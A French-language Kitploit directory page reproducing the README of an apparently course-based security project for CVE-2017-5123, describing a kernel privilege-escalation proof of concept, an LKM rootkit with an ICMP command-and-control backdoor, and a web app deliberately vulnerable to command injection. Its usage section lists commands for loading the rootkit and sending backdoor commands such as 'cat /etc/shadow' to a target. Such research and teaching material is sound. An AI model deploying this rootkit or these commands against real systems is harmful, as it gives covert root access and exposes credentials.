Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2017-5123 | Kitploit
Outils/GitHubGitHub/nabilboudra/cve-2017-5123
Escalade de PrivilègesExploitationExploitation d'Applications WebCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de BinairesLabs et Pratique
GitHubnabilboudra/cve-2017-5123

cve-2017-5123

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-5123

Ce dépôt contient une démonstration de CVE-2017-5123, une porte dérobée de commande et contrôle via ICMP, ainsi qu'une application web vulnérable à la CWE-78 (Injection de commandes système).

Fait partie de CSC 4308 - Défi 3.

Prérequis

  • Kernel Linux : 4.13 jusqu'à (mais excluant) 4.13.7
  • Node.js : 10.x
  • npm : 6.x

Aperçu

Ce projet illustre trois composants de recherche en sécurité distincts :

1. Exploit Kernel CVE-2017-5123 (lkm/rootkit.c)

Une preuve de concept pour la vulnérabilité de l'appel système waitid introduite dans le noyau Linux 4.13. Cette vulnérabilité permet une élévation de privilèges et une évasion de bac à sable.

  • ID CVE : CVE-2017-5123
  • ID CWE : CWE-787 (Écriture hors limites)
  • Impact : Élévation de privilèges locale
  • Auteur de l'exploit : Chris Salls (@chris_salls)

2. LKM Rootkit Kernel (lkm/lkm.c)

Un module noyau Linux (LKM) malveillant qui implémente un canal de commande et contrôle clandestin via des paquets d'écho ICMP (ping).

  • ID CWE : CWE-912 (Fonctionnalité cachée)
  • Fonctionnalités :
    • Intercepte les requêtes d'écho ICMP portant le numéro de séquence 25678
    • Extrait les commandes shell de la charge utile ICMP
    • Exécute les commandes en tant que root
    • Renvoie la sortie des commandes via des paquets de réponse d'écho ICMP

3. Application Web Vulnérable (vulnerable-app/)

Une application de partage de fichiers React + Node.js vulnérable à l'injection de commandes système.

  • ID CWE : CWE-78 (Injection de commandes système)
  • Faiblesse : Injection de métacaractères shell dans le champ du contenu du fichier

4. Pinger de Données ICMP (pinger/data-ping.c)

Un utilitaire permettant d'envoyer des requêtes d'écho ICMP conçues avec des charges utiles personnalisées pour communiquer avec la porte dérobée du rootkit kernel.

Utilisation

Chargement du LKM

Compiler le module noyau

root@kitploit:~
cd lkm
make

Charger le module noyau

root@kitploit:~
sudo insmod lkm.ko

Compiler le client Pinger

root@kitploit:~
cd ../pinger
gcc -o data-ping data-ping.c

Envoyer des commandes via ICMP

root@kitploit:~
# Doit être exécuté en root pour utiliser les sockets bruts
sudo ./data-ping <ip-cible> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"

Décharger le module

root@kitploit:~
sudo rmmod lkm

Rechargement rapide

root@kitploit:~
make reload

Exécution de l'application web vulnérable

root@kitploit:~
# Compiler le frontend
cd vulnerable-app/frontend
npm run build

# Copier le build dans le backend
cp -r build ../backend/

# Démarrer le serveur backend (sert à la fois l'API et le frontend)
cd ../backend
npm start

L'application sera disponible à l'adresse http://localhost:3001

Références

  • CVE-2017-5123 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123
  • CWE-78 : https://cwe.mitre.org/data/definitions/78.html
  • CWE-787 : https://cwe.mitre.org/data/definitions/787.html
  • CWE-912 : https://cwe.mitre.org/data/definitions/912.html
  • Code d'exploit original de Chris Salls : https://github.com/salls/kernel-exploits
Télécharger l’outil